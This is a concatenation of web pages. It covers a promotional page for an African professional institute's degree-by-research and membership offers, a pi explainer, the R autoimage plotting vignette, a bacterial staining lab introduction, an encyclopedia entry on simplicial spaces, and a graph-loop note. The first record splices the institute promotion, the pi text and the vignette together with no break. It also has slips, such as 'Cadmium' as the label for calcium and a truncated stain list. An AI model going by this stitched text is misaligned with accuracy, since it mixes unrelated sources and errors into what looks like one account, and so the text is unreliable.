The computing industry is a vital aspect of our national economy. The industry has impacted every aspect of American life including: mainframe computers in government and industry, supercomputers expanding the frontiers of science and technology, desktop computers at home and work, mobile computing, automobiles, communications, appliances, electronic games, entertainment, health care, and aerospace. The computer industry is one of the fastest growing segments of our economy and that growth will continue in the foreseeable future.
Computers are getting smaller and more powerful. Thus, the use of computers is increasing at a phenomenal rate. Each new computer application area requires the skills of the computer engineer. Jobs that do not exist today will be commonplace tomorrow and require computer engineers. Computer engineers are involved with both the design and development of computers as well as the utilization of computing systems in new and innovation applications. Examples are developing computing systems for automated manufacturing, developing computing systems for wireless communication systems, developing operating systems for specialized applications, developing security systems for computing systems, and developing smaller and more powerful computer chips. Computer engineers can design and develop both the hardware and software components present in every computing application. This is especially important in embedded computing systems such as wireless telephones and the automobile industry.
Computer Engineering education involves the traditional computer hardware education from Electrical Engineering Departments with the computer software education from Computer Science Departments. A computer engineer should have a deep understanding of both hardware and software. In addition, their education program has extensive components of mathematics and science disciplines.
With a Computer Engineering degree, an individual has a balanced view of hardware, software, hardware-software tradeoffs, and analysis, design and implementation techniques. The curriculum has been designed following the guidelines of the ACM and IEEE model curricula for Computer Engineering and in anticipation of meeting Accreditation Board for Engineering and Technology (ABET) standards.
DUAL CERTIFICATE OPPORTUNITY:-
DEGREE BY RESEARCH
There is an opportunity for students who hold an International Diploma, Higher International Diploma or International Post Graduate Diploma from our Professional Institutes to pursue academic programs in the following countries: Togo, Ghana, Sierra Leone, Gambia, Kenya, Republic of Benin, etc., for further degree study without any additional tuition fee, though the student is responsible for his/her transport, examination fee and accommodation. The same applies to those who apply for postgraduate programs such as master's and doctoral degrees: they can earn both a degree by research and an academic degree in postgraduate study.
A degree by research is a degree obtained on the basis of research undertaken by the student in support of the certificate that will be awarded. Furthermore, self-designed concentrations are also available, so that students can demonstrate their innovations in their area of research at any time and anywhere. A degree by research is a recognition of the student's intelligence and of the hard work done at graduate and postgraduate level, awarded by AIIPTR/ASU.
Students can obtain their degree-by-research certificate and transcript, together with the other documentation that accompanies the certificate, from AIIPTR/ASU.
UNIVERSITY ACADEMIC DEGREE PROGRAMS
University Academic Degree Programs comprise academic work completed in residence at an institution accredited by AIIPTR/ASU, or credit transferred from other institutions across the globe, leading to a degree awarded directly by Adam Smith University.
Academic and Professional Programmes
We offer both academic and professional courses, as follows: University Academic Degrees such as Associate, Bachelor, Master, Doctoral and Post-Doctoral Degrees; Institute Degrees by Research, such as Associate, Bachelor, Master, Doctoral and Post-Doctoral Degrees by research (academic and professional); International Higher Diplomas (academic and professional); postgraduate courses that lead to the award of academic and professional degrees; International Diplomas (academic and professional); and International Certificates (academic and professional); as well as different professional membership categories of our various institutes, such as Fellowship, Full Membership, Associate Membership, Corporate Institutional Membership, Graduate/Mature Candidate Membership and Student Membership.
Africa International Institute for Professional Training and Research Classes of Membership
Africa International Institute for Professional Training and Research has five classes of membership and they are Fellows, Members, Licentiates, Associates and Graduate Members.
Fellows, Members and Licentiates are corporate members of Africa International Institute for Professional Training and Research. Members of Africa International Institute for Professional Training and Research are elected or transferred to the various classes of membership based on their qualification and experience as specified by the Council.
A practising professional in the area of their course of studies seeking admission to the class of Fellows should meet the conditions set for the class of Members, as well as have fifteen years of professional experience, of which at least five years should include responsible charge of important professional work in their area of study (such as accounting, computer science or geological operations), or service as a consultant or advisor in the branches of their course of studies.
Admission into the class of Members requires practising professionals in their area of studies to be at least 21 years of age, with a Bachelor's degree with Honours in that particular area (such as geology) recognized by the African Government, as well as three years of professional experience in a branch of their course of studies.
Admission to the class of Licentiates requires applicants to be at least 21 years of age, possess at least a Diploma in their course of studies (such as accounting or geology) or an equivalent qualification, have five years of experience in a branch of their course, and pass membership examinations provided by Africa International Institute for Professional Training and Research or other external examinations recognized by the Council.
A candidate for election into the class of Associate Member shall be a person who has a diploma or degree in any professional discipline other than their area of studies.
He or she must have demonstrated a keen interest in the field and have worked on projects or in areas which required input from that particular discipline, such as biologists, computer scientists or geologists.
Graduate Members should have a Bachelor's degree with Honours in their course of studies that is recognized by the African Government, or an equivalent qualification.
This category of membership is reserved for corporate entities and institutions in specialized and relevant areas that wish to be identified with the noble course of the Institute by having the capacity to create an idea-oriented forum for the benefit of the Institute's members and employees.
Corporate Institutional bodies are entitled to use the abbreviation CMAIIPTR after their organization names.
Fresh graduates in relevant and related disciplines are eligible for membership admission under this category. An individual with modest academic qualification(s) and a long period of practical on-the-job experience of not less than ten (10) years is also eligible to apply for Graduate Membership of the Institute. To qualify for Associate Membership, the holder of a Graduate Membership is required to sit two papers in Professional Examination II and all papers in Professional Examination III of the Institute. Holders or awardees are entitled to use the abbreviation GAIIPTR after their names.
For studentship admission, a candidate must possess the following:
(1) 5 O-level credit passes, including English and Mathematics, from any recognized examination body.
(2) Good credits or passes at OND or HND level in any field.
(3) A first or second degree from any accredited university.
(4) Professional certificates, diplomas and any other certificates recognized by the different Councils.
Ed Roberts International Institute of Computer Engineering (Chartered)
Henry Edward “Ed” Roberts (September 13, 1941 – April 1, 2010) was an American engineer, entrepreneur and medical doctor who invented the first commercially successful personal computer in 1975. He is most often known as “the father of the personal computer”. He founded Micro Instrumentation and Telemetry Systems (MITS) in 1970 to sell electronics kits to model rocketry hobbyists, but the first successful product was an electronic calculator kit that was featured on the cover of the November 1971 issue of Popular Electronics. The calculators were very successful and sales topped one million dollars in 1973.
A brutal calculator price war left the company deeply in debt by 1974. Roberts then developed the Altair 8800 personal computer that used the new Intel 8080 microprocessor. This was featured on the cover of the January 1975 issue of Popular Electronics, and hobbyists flooded MITS with orders for this $397 computer kit.
Bill Gates and Paul Allen joined MITS to develop software and Altair BASIC was Microsoft’s first product. Roberts sold MITS in 1977 and retired to Georgia where he farmed, studied medicine and eventually became a small-town doctor.
Ed Roberts married Joan Clark (b. 1941) in 1962 and they had five sons, Melvin (b. 1963), Clark (b. 1964), John David (b. 1965), Edward (b. 1970), Martin (b. 1975) and a daughter Dawn (b. 1983). They were divorced in 1988.
Roberts married Donna Mauldin in 1991 and they were still married when interviewed by The Atlanta Journal-Constitution in April 1997. He was married to Rosa Cooper from 2000 until his death.
Roberts died April 1, 2010 after a months-long bout with pneumonia; he was 68. His sister, Cheryl R Roberts (b. November 13, 1947 – d. March 6, 2010), of nearby Dublin, Georgia, died at age 62, a few weeks before his death. During his last hospitalization in Macon, Georgia, hospital staffers were stunned to see an unannounced Bill Gates, who had come to pay last respects to his first employer. He was survived by his wife, all six of his children and his mother, Edna Wilcher Roberts. All live in Georgia.
Our Institute is Proud to bear the Name of this Great Advocate of Computer Engineering.
\(\pi\), or pi, is a Greek letter used to represent a mathematical constant. It is equal to the ratio of a circle’s circumference to its diameter. Its approximate value is 3.14159, but as it is an irrational number, its decimal expansion goes on forever without a recurring pattern.
\(\pi\) turns out to be very useful in a number of areas of mathematics, notably in geometry. As well as its applications to circles, it is used in formulas relating to volumes and surface areas of spheres and cones, and it appears in higher trigonometry too. Relevant lessons:
- N8a – Calculating exactly with fractions and with multiples of π
- G17b – Circumference of a circle
- G17c – Area of a circle
- G17e – Perimeter and area of composite shapes made up of polygons and sectors of circles, diameters
- G17f – Surface area and volume of spheres, pyramids, cones and composite solid
- G18a – Arcs and sectors of circles
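A quick illustration of \(\pi\) in the circle and sphere formulas mentioned above (the radius value is arbitrary):

```python
import math

r = 3.0                                  # arbitrary radius
circumference = 2 * math.pi * r          # equivalently, pi times the diameter
area = math.pi * r ** 2                  # area of the circle
sphere_volume = (4 / 3) * math.pi * r ** 3  # volume of a sphere of the same radius

print(circumference)   # -> 18.849...
print(area)            # -> 28.274...
print(sphere_volume)   # -> 113.097...
```

Because \(\pi\) is irrational, these results are necessarily approximations at any finite precision.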
The autoimage package makes it easy to plot a sequence of images with corresponding color scales, i.e., a sequence of heatmaps, with straightforward, native options for projection of geographical coordinates. The package makes it simple to add lines, points, and other features to the images, even when the coordinates are projected. The package allows for seamless creation of heat maps for data on regular or irregular grids, as well as data that is not on a grid.
The most important functions in autoimage are the pimage and autoimage functions. We illustrate the basic usage of these functions using two data sets: the first is data on an irregular grid and the second is non-gridded data.
The first data set we utilize comes from the North American Regional Climate Change Assessment Program (NARCCAP, https://www.narccap.ucar.edu/). Specifically, the data are the maximum daily surface air temperature (K) (abbreviated tasmax) for the five consecutive days of May 15, 2041 to May 19, 2041 simulated using the Canadian Regional Climate Model (Caya and Laprise, 1999) forced by the Community Climate System Model atmosphere-ocean general circular model (Collins et al., 2006). The data set contains
lon, a 140 \(\times\) 115 matrix of longitude coordinates; lat, a 140 \(\times\) 115 matrix of latitude coordinates; and tasmax, a 140 \(\times\) 115 \(\times\) 5 array, where each element of the third dimension of the array corresponds to the tasmax measurements of the respective day.
The second data set we utilize is geochemical measurements obtained by the United States Geological Survey (USGS) in the state of Colorado. The data are stored as a data frame with 960 rows and 31 columns.
The latitude and longitude variables are provided in the data frame, as well as Aluminum (Al), Calcium (Ca), Iron (Fe), and many more chemical measurements.
The autoimage function is a generalization of the pimage function, so we discuss the pimage function first.
The most important arguments of the pimage function are x, y, and z. x and y are the coordinate locations and z is the responses associated with the coordinates.
We create a basic image plot by providing x, y, and z to the pimage function.
data(narccap)
pimage(x = lon, y = lat, z = tasmax[,,1])
z can have differing formats depending on the type of data. If the data are observed on a regular grid, then z will be a matrix with dimensions matching the dimensions of the grid, and x and y will be vectors of increasing values that define the grid lines. If the data are observed on an irregular grid (e.g., a regular grid that is rotated or projected), then z will be a matrix with dimensions matching the dimensions of the grid, and x and y will be matrices whose coordinates specify the x and y coordinates of each value in z. If the data are not on a grid, then x and y will be vectors specifying the coordinate locations, and z will be the vector of responses at each coordinate. In that case, multilevel B-splines are used to automatically predict the response on a grid before plotting (using the mba.surf function in the MBA package).
We create a heat map using the non-gridded Aluminum measurements for the state of Colorado.
data(co, package = "gear")
pimage(co$longitude, co$latitude, co$Al, xlab = "lon", ylab = "lat")
We now discuss the basic options of the pimage function.
The color scheme used for an image plot can be of great importance. We use the Viridis color palette from the colorspace package by default, which approximates the "viridis" palette in the viridisLite package. As stated in the documentation of the viridis function in the viridisLite package, the color map is "... designed in such a way that [it] will analytically be perfectly perceptually-uniform, both in regular form and also when converted to black-and-white. [It is] also designed to be perceived by readers with the most common form of color blindness." The colors of the color scale can be modified by passing a vector of colors to the col argument through ..., as in the image function in graphics. We use 6 colors from the Plasma color palette in the colorspace package in the next example.
pimage(lon, lat, tasmax[,,1], col = colorspace::sequential_hcl(n = 6, palette = "Plasma"))
The orientation of the color scale can be changed by changing the legend argument. The default is legend = "horizontal". The color scale can be removed by specifying legend = "none" or rotated to a vertical orientation by specifying legend = "vertical".
The following code creates a heat map with a vertical color scale.
pimage(x = lon, y = lat, z = tasmax[,,1], legend = "vertical")
The longitude and latitude coordinates can be projected before plotting by specifying the proj, parameters, and orientation arguments of pimage. Prior to plotting, the coordinates are projected using the mapproject function in the mapproj package. proj specifies the name of the projection to utilize (the default, "none", applies no projection). The parameters argument specifies the parameter values of the chosen projection, and orientation can be used to change the orientation of the projection. See the mapproject function in the mapproj package for more details regarding these arguments.
We now create a heat map with projected coordinates. We will utilize the Bonne projection using 45 degrees as the standard parallel. A grid is automatically added to projected images because latitude and longitude parallels are not straight for most projections.
pimage(x = lon, y = lat, z = tasmax[,,1], proj = "bonne", parameters = 45)
Several maps can be automatically added to the image by specifying the map argument. The maps come from the maps package, and include the world, state, county, and nz (New Zealand) maps, among others.
We add national boundaries to our previous map.
pimage(x = lon, y = lat, z = tasmax[,,1], proj = "bonne", parameters = 45, map = "world")
The last major argument to the pimage function is the lratio argument. This argument controls the relative height or width of the color scale in comparison with the main plotting area. Increasing lratio increases the thickness of the color scale, while decreasing lratio decreases the thickness of the color scale.
Additional arguments can be passed to the pimage function via .... These will be discussed later in this vignette.
The autoimage function generalizes the pimage function to allow for multiple images in the same plot. Most of the arguments are the same as for the pimage function, so we do not replicate their discussion except when necessary.
The structure of z will vary slightly from the pimage function. Specifically, if multiple gridded images are to be constructed, then z will be a three-dimensional array instead of a matrix. Each element of the third dimension of z corresponds to the matrix of gridded values for one image. If images for multiple non-gridded variables are to be constructed, then z will be a matrix with each column corresponding to a different variable.
Passing a three-dimensional array to autoimage constructs a sequence of images with a common legend.
autoimage(lon, lat, tasmax)
Passing a two-dimensional matrix for z (where the number of rows matches the length of x and y) constructs a sequence of images for non-gridded data with a common legend. Titles are added to each image using the main argument by providing a character vector whose length matches the number of plotted images.
autoimage(co$longitude, co$latitude, co[,c("Al", "Ca", "Fe", "K")],
          main = c("(a) Aluminum %", "(b) Calcium %", "(c) Iron %", "(d) Potassium %"),
          xlab = "lon", ylab = "lat")
Separate color scales will be used for each image when common.legend = FALSE.
autoimage(co$longitude, co$latitude, co[,c("Al", "Ca", "Fe", "K")],
          common.legend = FALSE,
          main = c("(a) Aluminum %", "(b) Calcium %", "(c) Iron %", "(d) Potassium %"),
          xlab = "lon", ylab = "lat")
The dimensions of the plotting matrix can be changed by specifying the size argument. If not provided, then a sensible choice is automatically chosen via the autosize function. The size argument should be a two-dimensional vector where the first element corresponds to the number of rows of images and the second element corresponds to the number of columns.
We create a 1 \(\times\) 3 matrix of images for the NARCCAP data.
autoimage(lon, lat, tasmax[,,1:3], size = c(1, 3))
A common title is sometimes desired for a sequence of images. This can easily be added by specifying the outer.title argument. The margins of the common title can be controlled via the oma argument of par. However, if oma is not specified beforehand, then a sensible value is automatically chosen (while showing a warning to the user).
We add a common title to the NARCCAP data.
autoimage(lon, lat, tasmax, outer.title = "tasmax for 5 days")
## Warning in autolayout(size, legend = legend, common.legend = common.legend, : There is no room in the outer margin for an outer title. ## Setting par(oma = c(0, 0, 3, 0)).
The mercator projection can sometimes be problematic for various reasons, especially with the world map, as horizontal lines appear across the plot area. We have attempted to solve this issue by clipping x and y coordinates that fall outside the range of the plot limits.
autoimage(x = lon, y = lat, z = tasmax[,,1], map = "world", xlab = "longitude", ylab = "latitude", proj = "mercator", axes = FALSE)
Suppose we want to add custom features to a sequence of images, with each image receiving different features. One can create a richer sequence of images using the autolayout and autolegend functions. The autolayout function partitions the graphic device into the sections needed to create a sequence of images. Its most important arguments are size, legend, common.legend, and lratio, which correspond to the same arguments in the autoimage function. The outer argument specifies whether an outer.title is desired; the default is FALSE. By default, numbers identify the plotting order of the sections, though these can be hidden by setting show = FALSE. As an initial example, we create a 2 \(\times\) 3 grid of images with a common vertical legend.
autolayout(c(2, 3), legend = "v")
The images should be created using the pimage function while specifying legend = "none". After the desired image or set of images is created, one can automatically add the appropriate legend by calling autolegend. The autolegend function recovers relevant legend parameters from the most recent pimage call. Consequently, if a common legend is desired, then it is important to specify a common zlim argument among all relevant pimage calls.
Various features can be added to the images using the plines, ppoints, ptext, and ppolygon functions. These are analogues of the lines, points, text, and polygon functions in the graphics package, to be used with images containing projected coordinates.
We now create a complicated (though unrealistic) example of this. We first extract the borders of Hawaii and Alaska from the "world" map in the maps package and store them as the hiak list. We then select a small subset of cities in Colorado from the us.cities dataset in the maps package and store this in the codf data frame. Lastly, we select the U.S. capitals from the us.cities dataset and store this in the capdf data frame.
# load world map
data(worldMapEnv, package = "maps")
# extract hawaii and alaskan borders
hiak <- maps::map("world", c("USA:Hawaii", "USA:Alaska"), plot = FALSE)
# load us city information
data(us.cities, package = "maps")
# extract colorado cities from us.cities
codf <- us.cities[us.cities$country.etc == "CO", ]
# select smaller subset of colorado cities
# extract capitals from us.cities
capdf <- us.cities[us.cities$capital == 2, ]
Having obtained the relevant information, we set up a 1 \(\times\) 2 matrix of images with individual horizontal legends and an area for a common title. We create an image plot of NARCCAP data using the mercator projection and including grey state borders. The borders of Hawaii and Alaska are added using the
plines function. The state capitals are added to the image using the
ppoints function. The first image is then titled using the
title function. The legend is then added using the
autolegend function. Next, an image of the Colorado Aluminum measurements is created. The coordinates are projected using the Bonne projection, the color scheme is customized, grey county borders are added to the plot, but the grid lines are removed. The
ppoints function is then used to add locations for several Colorado cities to the image. The
ptext function is then used to add the names of these cities to the image. The second image is then titled using the
title function. The appropriate legend is then added using the
autolegend function. Lastly, a common title is added using the
# setup plotting area
autolayout(c(1, 2), legend = "h", common.legend = FALSE, outer = TRUE)
## Warning in autolayout(c(1, 2), legend = "h", common.legend = FALSE, outer = TRUE): There is no room in the outer margin for an outer title. ## Setting par(oma = c(0, 0, 3, 0)).
# create image of NARCCAP data
# xlim is chosen to include alaska and hawaii
# add grey state borders
pimage(lon, lat, tasmax[,,1], legend = "none", proj = "mercator",
       map = "state", xlim = c(-180, 20),
       lines.args = list(col = "grey"))
## Warning in paxes(xlim = c(-180, 20), ylim = c(20.5263919830322, ## 73.0147552490234: The x axis tick positions are not between -180 and 180, which ## creates problems with the mercator projection. Attempting to automatically ## correct the issue. The user may need to specify xaxp, or for more control, the ## xat argument of the paxes.args list.
# add hawaii and alaskan borders
plines(hiak, proj = "mercator", col = "grey")
# add state capitals to image
ppoints(capdf$lon, capdf$lat, proj = "mercator", pch = 16)
# title image
title("tasmax for North America")
# add legend for plot
autolegend()
# load colorado geochemical data
data(co, package = "gear")
# create image for colorado aluminum measurements:
# use bonne projection, customize legend colors,
# add grey county borders, exclude grid
pimage(co$lon, co$lat, co$Al, map = "county", legend = "none",
       proj = "bonne", parameters = 39,
       paxes.args = list(grid = FALSE),
       col = fields::tim.colors(64),
       lines.args = list(col = "grey"),
       xlab = "lon", ylab = "lat")
# add colorado city points to image
ppoints(codf$lon, codf$lat, pch = 16, proj = "bonne")
# add names of colorado cities to image
ptext(codf$lon, codf$lat, labels = codf$name, proj = "bonne", pos = 4)
# title plot
title("Colorado Aluminum levels (%)")
# add legend to current image
autolegend()
# add common title for plots
mtext("Two complicated maps", col = "purple", outer = TRUE, cex = 2)
The plots generated by the pimage and autoimage functions can be customized in numerous ways by passing additional arguments through the ... argument of the functions. The customizations are mostly the same for both functions, so we illustrate them using the pimage function when possible, for simplicity.
Lines or points can be added to each image by passing the lines and points arguments to the functions. Each argument should be a named list with x and y components specifying the coordinates to join (for lines) or plot (for points). Note that if multiple unconnected lines are to be drawn, then each line should be separated by an NA value, similar to how maps are constructed in the maps package.
To illustrate usage of these arguments, we extract United States state boundaries from the maps package and reformat the us.cities dataset from the maps package. Note that statepoly is automatically a list with x and y components, while the list must be created manually for citylist.
data(stateMapEnv, package = "maps")
statepoly <- maps::map("state", plot = FALSE)
citylist <- list(x = us.cities$long, y = us.cities$lat)
We now add these state lines and city locations to the image.
```r
pimage(lon, lat, tasmax[,,1], lines = statepoly, points = citylist)
```
The appearance of the lines and points can be customized by passing the `lines.args` and `points.args` arguments through `...`. Each argument should be a named list with components matching the arguments of the `lines` and `points` functions in the graphics package.
We change the appearance of the lines and points in the previous plot by specifying these arguments.
```r
pimage(lon, lat, tasmax[,,1], lines = statepoly, points = citylist,
       lines.args = list(lwd = 2, lty = 3, col = "white"),
       points.args = list(pch = 20, col = "blue"))
```
Text can be added to each image by passing the `text` argument through `...`. `text` should be a named list with components `x` and `y`, which specify the locations to draw the text, and `labels`, which specifies the text to write at each location. The appearance of the text can be customized by passing the `text.args` argument through `...`. `text.args` should be a named list with components matching the non-`x`, `y`, and `labels` arguments of the `text` function in the graphics package.
We add the names and locations of two Colorado cities to the Colorado geochemical data.
```r
citypoints = list(x = c(-104.98, -104.80), y = c(39.74, 38.85),
                  labels = c("Denver", "Colorado Springs"))
autoimage(co$lon, co$lat, co[,c("Al", "Ca")], common.legend = FALSE,
          main = c("Aluminum", "Cadmium"), points = citypoints,
          points.args = list(pch = 20, col = "white"),
          text = citypoints, text.args = list(pos = 3, col = "white"),
          xlab = "lon", ylab = "lat")
```
When projections are used, the grid lines do not always extend as far as they should, so axis customization is often desirable. Additionally, the appearance of the grid lines may need improving. The appearance of the axes (and the locations of the grid lines) can be changed by passing the `axis.args` argument through `...`. `axis.args` should be a named list with components matching the arguments of the `axis` function in graphics. The exception is that `xat` and `yat` arguments are used instead of `at` so that the ticks on the x and y axes can be specified separately. The appearance of the grid lines can be changed by passing the desired changes through the `paxes.args` argument. This is a named list with components matching the arguments of the function used to draw the grid lines (e.g., `col` and `lty`).
Consider the following poor graphic.
```r
pimage(lon, lat, tasmax[,,1], proj = "bonne", parameters = 40)
```
The grid lines do not extend nearly far enough. There are only two tick marks on the y axis. The legend is too thin. We can add additional, longer grid lines by specifying `xat` and `yat` in `axis.args`. We can also further change the appearance of the axes via other components of `axis.args`. We change the appearance of the grid lines by specifying choices in `paxes.args`. We change the appearance of the legend by specifying choices in `legend.axis.args`. We change the legend thickness by specifying `lratio`.

```r
pimage(lon, lat, tasmax[,,1], proj = "bonne", parameters = 40,
       axis.args = list(yat = seq(-10, 70, by = 10),
                        xat = seq(-220, 20, by = 20),
                        col.axis = "darkgrey", cex.axis = 0.9),
       paxes.args = list(col = "grey", lty = 2),
       legend.axis.args = list(cex.axis = 0.9),
       lratio = 0.3)
```
The breaks and colors of the color scale can be modified by specifying the `breaks` and `col` arguments, as in the `image` function in graphics. Additional changes can be made by specifying `legend.axis.args`, a named list with components matching the arguments of the `axis` function, which is used in creating the legend.

```r
pimage(lon, lat, tasmax[,,1],
       col = colorspace::sequential_hcl(6, palette = "Plasma"),
       breaks = c(0, 275, 285, 295, 305, 315, 325),
       legend.axis.args = list(col.axis = "blue", las = 2,
                               cex.axis = 0.75))
```
When non-gridded data are used, the settings for the gridded surface approximation can be passed through `...` by specifying `interp.args`, a named list with components matching the non-`xyz` arguments of the `mba.surf` function in the MBA package. We project the Colorado aluminum measurements onto a finer grid in the following plot.

```r
pimage(co$lon, co$lat, co$Al,
       interp.args = list(no.X = 100, no.Y = 100),
       xlab = "lon", ylab = "lat")
```
The appearance of the common title specified via `outer.title` can be modified by passing `mtext.args` through `...`. `mtext.args` should be a named list with components matching the arguments of `mtext`, which is the function used to create the common title.

```r
autoimage(lon, lat, tasmax, outer.title = "tasmax for 5 days",
          mtext.args = list(col = "blue", cex = 2))
```

```
## Warning in autolayout(size, legend = legend, common.legend = common.legend, :
## There is no room in the outer margin for an outer title.
## Setting par(oma = c(0, 0, 3, 0)).
```
The various options for the labeling, axes, and legend are largely independent. For example, passing an axis-related argument such as `col.axis` through `...` will not affect the axes unless it is passed as part of the named list `axis.args`. However, one can set the various `par` options prior to plotting to simultaneously affect the appearance of multiple aspects of the plot. The `reset.par` function can be used afterward to reset the graphics device options to their default values. We provide an example below.

```r
par(cex.axis = 0.5, cex.lab = 0.5, mgp = c(1.5, 0.5, 0),
    mar = c(2.1, 2.1, 2.1, 0.2), col.axis = "orange",
    col.main = "blue", family = "mono")
pimage(lon, lat, tasmax[,,1])
title("very customized plot")
```
Mearns, L.O., et al., 2007, updated 2012. The North American Regional Climate Change Assessment Program dataset, National Center for Atmospheric Research Earth System Grid data portal, Boulder, CO. Data downloaded 2016-08-12.
Mearns, L. O., W. J. Gutowski, R. Jones, L.-Y. Leung, S. McGinnis, A. M. B. Nunes, and Y. Qian: A regional climate change assessment program for North America. EOS, Vol. 90, No. 36, 8 September 2009, pp. 311-312.
D. Caya and R. Laprise. A semi-implicit semi-Lagrangian regional climate model: The Canadian RCM. Monthly Weather Review, 127(3):341–362, 1999.
M. Collins, B. B. Booth, G. R. Harris, J. M. Murphy, D. M. Sexton, and M. J. Webb. Towards quantifying uncertainty in transient climate change. Climate Dynamics, 27(2-3):127–147, 2006. | <urn:uuid:db690327-f835-4f61-a08b-0b9f36b4bc6d> | CC-MAIN-2023-14 | http://cran.uni-muenster.de/web/packages/autoimage/vignettes/autoimage.html | s3://commoncrawl/crawl-data/CC-MAIN-2023-14/segments/1679296944996.49/warc/CC-MAIN-20230323034459-20230323064459-00208.warc.gz | en | 0.750984 | 5,807 | 2.96875 | 3 |
Bacterial Cell Size, Morphology, and Arrangement
Bacteria come in many different sizes and shapes (morphology = shape). The sizes of bacteria range from \(<1.0\mu m\) to \(>250\mu m\). However, most bacteria, and the ones you will observe in lab, range from about \(1\mu m-15\mu m\). The most common shapes of bacteria, and the ones you will observe, are cocci, bacilli, and spirilla.
Bacteria also often grow into different arrangements as the cells divide. Cocci have the most variety in their arrangements, some bacilli may stay in pairs or chains as they divide, but spirilla are found singly. Remember that organisms, and their arrangements, are three-dimensional. Note that sarcina is essentially cuboidal and staphylococci are a cluster formed by cells dividing in an irregular pattern.
Stains are solutions containing a pigmented molecule. The part of the molecule that is colored is called the chromophore. The chromophores carry either a net + or – charge, therefore are attracted to the opposite charge. Stains with a net + charge are called “basic stains”, those with a net – charge are called “acid stains”. Bacterial cells have a net – charge. Thus, basic stains will attach to the cells, while the cell will repel acid stains.
Basic stains (+ charge)-
- Methylene blue
- Basic fuchsin
- Crystal violet
- Malachite green
Acid stains (- charge)-
- Acid fuchsin
100x lens and Oil Immersion
Bacteria are very small, of course, so it is necessary to view them at the highest magnification possible with the best resolution possible. In a light microscope this is about 1000x due to optical limitations. The oil immersion technique is used in order to enhance resolution. This requires a special 100x objective. The 100x lens is immersed in a drop of oil placed on the slide in order to eliminate any air gaps and loss of light due to refraction (bending of the light) as the light passes from glass (slide) → air → glass (objective lens). Immersion oil has the same refractive index as glass. When used, light passes through glass → oil → glass without loss due to refraction.
When the oil immersion lens is in place there are a few things to be aware of and very careful about-
- The working distance is VERY small.
- Depth of focus is also VERY small.
- Use only the fine focus, and focus slowly.
- Increase the light, as the lens opening is very small.
- Adjust the condenser and iris diaphragm as needed.
- Do not drag the 40x lens through the oil, if you need to go to lower power-4x or 10x, rotate the nosepiece in the opposite direction to avoid the 40x lens. Dragging the 40x lens through the oil will damage the lens!
- The immersion oil has the same refractive index as glass, so you may go back to low power (again, not 40x) and still see your specimen.
- Do not make any decisions or assessments about your bacterium until you are focused at 100x.
- If you see the cells clearly with the 4x, 10x, 40x, but don’t see it with 100x, your specimen may be upside down. Ask your instructor for help.
Viewing with the oil immersion 100x objective lens-
- Place a stained slide on the stage in the clips.
- View the slide at low power (4x) and look for staining; for very small cells look for a pattern of regular tiny specks. Once in focus, move to the next objective (10X), focus with fine focus only. Move to 40x, fine focus only (if the 40x objective is not very clear—due to it being repeatedly dragged through the oil, skip it). Make sure that the area you want to see is dead center in the field of view.
- Rotate the objective aside so that you are between it and the 100x objective and let a small drop of oil fall onto the slide where your specimen is. Carefully rotate the 100x objective into place, immersing it into the drop of oil.
- While looking through the oculars, very carefully and slowly use the fine focus to bring the image into sharp focus. If you can’t get it into focus, or have lost what you are looking for you may go back to 4x or 10x and start over (do not remove the oil, it’s fine).
- When finished with your slides wipe the oil from the 100x objective with lens paper (DO NOT use anything else to clean the lens!). The lens retracts into the lens housing. Be sure to push up gently to remove oil that has moved up in the housing (this happens more when one is viewing a slide and over focuses and pushes the lens up into the housing). Then, use lens cleaner and lens paper to completely remove all oil from the lens. Keep the lens paper flat and use a circular motion. Do not wad up the lens paper. Finally, use lens paper to check all the other objectives and parts of the microscope—focus knobs, stage, drips onto the condenser, etc., and clean up any oil on them.
Contributors and Attributions
Kelly C. Burke (College of the Canyons) | <urn:uuid:4c568a8b-5227-4667-995e-bd8797df0255> | CC-MAIN-2023-14 | https://bio.libretexts.org/Courses/College_of_the_Canyons/Bio_221Lab%3A_Introduction_to_Microbiology_(Burke)/17%3A_Smear_Prep_and_Simple_Stains/17.02%3A_Introduction | s3://commoncrawl/crawl-data/CC-MAIN-2023-14/segments/1679296945282.33/warc/CC-MAIN-20230324113500-20230324143500-00208.warc.gz | en | 0.941932 | 1,183 | 3.453125 | 3 |
A topological space $X$ equipped with a covering by topological simplices (called a triangulation) such that the faces of every simplex belong to the triangulation, the intersection of any two simplices is a face of each (possibly empty), and a subset $F\subset X$ is closed if and only if its intersection with every simplex is closed. Every simplicial space is a cellular space. The specification of a triangulation is equivalent to the specification of a homeomorphism $|S|\to X$, where $|S|$ is the geometric realization of some simplicial complex. Simplicial spaces are also called simplicial complexes or simplicial decompositions. Simplicial spaces are the objects of a category whose morphisms $X\to Y$ are mappings such that every simplex of the triangulation of $X$ is mapped linearly onto some simplex of the triangulation of $Y$. The morphisms are also called simplicial mappings.
The term "simplicial space" is not often used in this sense; the more usual name for a space which admits a triangulation is a polyhedron (cf. Polyhedron, abstract). The term "simplicial space" more commonly means a simplicial object in the category of topological spaces (cf. Simplicial object in a category).
[a1] E.H. Spanier, "Algebraic topology", McGraw-Hill (1966) pp. 113ff
[a2] B. Gray, "Homotopy theory. An introduction to algebraic topology", Acad. Press (1975) §12
Simplicial space. Encyclopedia of Mathematics. URL: http://encyclopediaofmath.org/index.php?title=Simplicial_space&oldid=31472 | <urn:uuid:990fb679-5649-4555-b04f-1998b67429d6> | CC-MAIN-2023-14 | https://encyclopediaofmath.org/index.php?title=Simplicial_space&oldid=31472 | s3://commoncrawl/crawl-data/CC-MAIN-2023-14/segments/1679296945372.38/warc/CC-MAIN-20230325191930-20230325221930-00208.warc.gz | en | 0.888667 | 404 | 3.03125 | 3 |
If there's a unique two-step path between every pair of nodes in a directed graph, then every node has \(k\) neighbors and the graph has \(k\) loops, where \(k^2\) is the number of nodes in the graph.
Astonishingly, you can prove this result using the machinery of linear algebra. You represent the graph as a matrix \(M\) whose \((i,j)\) entry is one if nodes i and j are neighbors, or 0 otherwise. The sum of the diagonal entries (the trace of the matrix) tells you the number of loops. The trace is also equal to the sum of the generalized eigenvalues, counting repetitions, so you can count loops in a graph by finding all the eigenvalues of the corresponding matrix.
